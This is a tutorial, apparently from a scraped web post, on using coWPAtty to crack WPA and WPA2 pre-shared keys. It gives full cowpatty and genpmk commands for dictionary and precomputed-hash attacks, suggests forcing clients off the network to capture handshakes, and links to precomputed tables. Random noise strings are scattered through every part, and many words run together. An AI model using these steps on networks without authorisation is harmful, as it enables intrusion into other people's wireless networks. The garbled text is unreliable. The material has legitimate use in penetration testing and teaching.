coWPAtty for Windows MAIN:" c# [' V" W5 W: S0 @- t+ L- A" K4 C) ]3 |% A5 m8 g, ]0 Z' u
"coWPAtty is designed to audit the pre-shared key (PSK) selection for WPA networks based on the TKIP protocol." - Joshua Wright. ! j4 _$ I9 I$ ~6 {, C, a" S6 d% L* W+ I# L. @
Project Homepage: http://www.willhackforsushi.com/Cowpatty.html
r0 U5 h3 D6 v% N4 J$ W; C
7 {4 K% j& u, O0 Z/ r+ V% x* X* u& b. U
0 _+ E3 h" j+ ^; FLocal Mirror: Cowpatty-4.0-win32.zip MD5: aa9ead2aacfcc493da3684351425d4c6
9 b3 @4 E& O' [: O7 [: o* k/ n7 [# ]. D( O0 X, N
' u8 t9 G) I5 T @) g7 {! a% }/ Y$ [7 e3 |8 n
coWPAtty Dictionary Attack
6 x4 s# A- H% s: m, {$ H
; ~7 h4 W' N$ U0 v0 j Precomputing WPA PMK to crack WPA PSK
F1 B C$ E) l' {# v- F% P/ E$ w7 Q$ e7 b- j coWPAtty Precomputed WPA Attack
; i, y# U4 E4 B
% A. r' _9 W" c3 wcoWPAtty Recomputed WPA2 Attack
$ C( N7 |* e# d. k
% K; j' K6 V* M5 [$ E6 jcoWPAtty Tables
9 z; I& O1 z* I8 W+ [: [- K- w- b! [$ Y8 ? n4 CcoWPAtty Usage:" l' Q1 y& _/ ]; a, B. K
, B$ @' w* S7 z/ \4 r' Y5 V! ~) Y/ b2 T- G1 @7 D% T1 @0 N3 U
8 g* d6 s' \ R# D$ w6 d l' R4 f+ X- I& F5 I4 g
coWPAtty Dictionary Attack:3 f- z: V! n% z. y3 i; ~
9 a, {2 P& p m( @ Toperform the coWPAtty dictionary attack we need to supply the tool witha capture file that includes the TKIP four-way handshake, a dictionaryfile of passphrases to guess with and the SSID for the network.
+ y% ~( ~* }3 k( g9 g1 _6 x5 V$ c, m) e: q+ k# @% d In orderto collect the four-way handshake you can either wait until a clientjoins the network or preferably you can force it to rejoin the networkusing tools like void11 or aireplay and capture the handshakes usingsomething like kismet, ethereal or airodump.
0 u' ]8 p( o- ~% F; \1 z; Y$ Q; @& B7 o
$ T6 c# w- \, a# D L- {cowpatty -f dict -r wpapsk-linksys.dump -s linksys
' e! ?0 H5 D0 @# p" {) M- p' k1 V1 n1 \8 z7 A2 J1 Q
3 _& H1 X/ P N& ^" Z, B }9 f0 l/ E- ]: n3 b* ?1 K
" G4 ?: D4 ^8 [, ^8 k6 h7 q, S: ^' f$ N( z, M6 d. m) W9 t3 \" w4 K3 f5 ~) g0 f
5 T. h5 ^/ s! d; M- }' H" q! g% M/ v% a% e1 t( o3 L# s, n, `& \5 T1 _' p' ]! l' ~
As youcan see this simple dictionary attack took 51 seconds, we can speed upthis process by precomputing the WPA-PMK to crack the WPA-PSK (seebelow).
, M+ W6 X7 x2 \7 F* Y( K0 F# p/ S
% Q/ P/ G1 V, P0 F1 Xwpapsk-linksys.dump is the capture containing the four-way handshake
1 G4 P# A/ r" Z# c8 y$ j& x; t0 E7 M
9 ~! J4 H5 R3 [( B" }8 \6 U% Qdict is the password file
B& R( A8 E) j5 \. h. B+ C: _! o. t( ~5 V/ _' C# q
linksys is the network SSID
& b, @' m2 p4 p4 ^1 @6 C; @2 V
! Q/ E1 o1 L, n5 @* v, C# z, |3 f: [" z; k3 X6 T3 Z
' K: H' D- G V/ s+ bPrecomputing WPA PMK to crack WPA PSK:& ?( q1 a- w9 ?+ R, ^4 }& y8 k& Z' [
/ z% V# h8 j$ j1 o7 y& a9 Ugenpmkis used to precompute the hash files in a similar way to Rainbow tablesis used to pre-hash passwords in Windows LANMan attacks. There is aslight difference however in WPA in that the SSID of the network isused as well as the WPA-PSK to "salt" the hash. This means that weneed a different set of hashes for each and every unique SSID i.e. aset for "linksys" a set for "tsunami" etc.
6 r1 T3 s9 T+ N
5 j/ J; c% [+ H( w8 i8 z5 ]' V4 E2 p; p1 q8 c! u/ S6 o, @9 ~0 r5 W+ ?
So to generate some hash files for a network using the SSID cuckoo we use:
3 ~: Z! Q. |$ b/ u2 [& |! Y F; l: H& _3 f O& m8 g U" u
$ n* e0 x' C) z* Z- [, L3 U2 P4 {( d8 Y9 L0 t0 C
genpmk -f dict -d linksys.hashfile -s linksys
" e: r5 S, a8 M1 L: Q: c/ S0 o# [( B" B' g5 @
/ G2 ^& k8 v; a4 x) v( E: Q' u1 `( T( K g( ~0 A 4 s9 p5 H" u" N3 B- I- p
' t- \0 G7 ~* y# s! Y. s+ H8 `, i2 {: ~
' Q. y3 T- l! B) a% {dict is the password file
$ u! {* J: _; d0 ]
9 U1 p5 N- X: D4 h3 _linksys.hashfile is our output file
) f0 i+ h, p, E! B; r
% F" u( X V' o+ `9 `; P linksys is the network ESSID
; B) W5 x" i1 y8 ?2 q n5 Q2 [6 @" v8 X; L7 M: j4 E; n! n9 I4 z# l. N: E5 X, X1 |+ b( P. O( b
; z) c: \ M) TcoWPAtty Precomputed WPA Attack:4 z7 T. n" N& j p5 E1 G! A3 g+ }3 y+ S$ N% Z' O
Now wehave created our hash file we can use it against any WPA-PSK networkthat is utilising a network SSID of cuckoo. Remember the capture(wpa-test-01.cap) must contain the four-way handshake to be successful.
8 @ f& i$ s1 l+ \; n
0 a" N6 Z: W/ t D# l8 P( Z' W) n7 _ A) X$ P: B
- H+ |; C$ S- c; ecowpatty -d linksys.hashfile -r wpapsk-linksys.dump -s linksys
D3 w7 m& B0 S* U
. w8 {, G( v' j# c8 G! n3 L! ?
& a" ~8 f7 n% N7 q7 r- c7 W8 c$ }6 G8 b) O& W e5 U6 K% G$ z3 ]4 e" V5 \8 f2 ^9 d1 D% S4 o/ g3 `" t
wpa-test-01.cap is the capture containing the four-way handshake
( q$ w( O8 F( J7 X5 S) h0 T) X8 j# m linksys.hashfile are our precomputed hashes
3 @2 j- b# M. z, I/ N( I! Y% d7 e, s linksys is the network ESSID
7 r! r& ?$ D& r: }. A* ~( d3 [2 i6 g, v/ d& L
, d/ K: u. o3 D- S7 K* ]: }
3 U; Q4 y0 U8 X3 d6 V$ Z3 gNotice that cracking the WPA-PSK took 0.04 seconds with the pre-computed attacked as opposed to 200 secondswith standard dictionary attack mode, albeit you do need to pre-computethe hash files prior to the attack. However, precomputing large hashfiles for common SSIDS (e.g. linksys, tsunami) would be a sensible movefor most penetration testers.
4 M' n, w5 n3 W$ z. w1 j
8 W& s, p' @& z Y
0 ~4 W! X) x: g# ^* v# `. W7 b$ h- v' ?3 z1 ccoWPAtty Precomputed WPA2 Attack:- d( ^7 X: ~* l+ ]0 B+ S1 C) P! C9 i- }/ b* k
coWPAtty4.0 is also capable of attacking WPA2 captures. Note: The same hashfile as was used with the WPA capture was also used with the WPA2capture.
% l1 s( h" n7 }0 l" o1 v% X+ ]& j9 d3 ^+ Y3 p: {; P& A cowpatty -d linksys.hashfile -r wpa2psk-linksys.dump -s linksys
9 [6 o# c. z+ L5 K2 C3 v0 F1 M' Z4 k# ~ 3 y8 E" u [6 T4 X, N) Q0 |7 _. n9 Y2 |" m4 ^% L
( K% b$ z. J1 Z" q- X1 X* r' r! j3 Q" s9 N* U- [" ~# J6 ], c& k7 A+ g wpa2psk-linksys.dump is the capture containing the four-way handshake
* r3 B0 k( N+ ]4 O- o: ^4 }! m. ~ dict is the password file
4 i8 j$ `6 x- D* g2 x- W1 {3 V! b% U0 ?+ Y% O linksys is the network SSID
]/ t N9 Y( E) _: e b0 _/ q1 A7 ^! _6 ~* A( d( Z
* v K0 m+ Q0 `/ T6 Y' A: v9 t6 @# J' Y. P7 t* G, X6 `/ LcoWPAtty Tables: & \4 R. }8 _9 Q. ]- y
8 ?! h5 l% \6 E, G3 `" n9 g1 i( ?- AThe Church of Wifi have produced some lookup tables for 1000 SSID's computed against a 170,000 word password file. The resultant table are approximately 7 Gigabytes in size and can be downloaded via Torrent:
0 |& }9 ?$ f& A( k! M9 s' a" c1 A( w0 `+ d& ~3 Z p9 A: H8 d8 ?% c- `& w1 u% I% e, b$ H" w4 ?/ [
http://torrents.lostboxen.net/co ... atty-4.0_2006-10-19' Q- t) v6 V: X
2 K9 `" L& E+ T$ x, r& g4 S9 Q6 H6 y# _! P3 J% n
' W8 |9 g8 _8 @/ r+ k3 kA 33 Gigabyte set of tables are also available: http://umbra.shmoo.com:6969/$ d5 C" P* g$ p! D, i8 a9 d4 g' Q6 ^' F' }0 A& B" m
; _! I( K0 j" t; {' x4 j1 N8 u) d+ W% V' ?2 W% rOr you can buy them via DVD, direct from Renderman (initiator of the project): http://www.renderlab.net/projects/WPA-tables/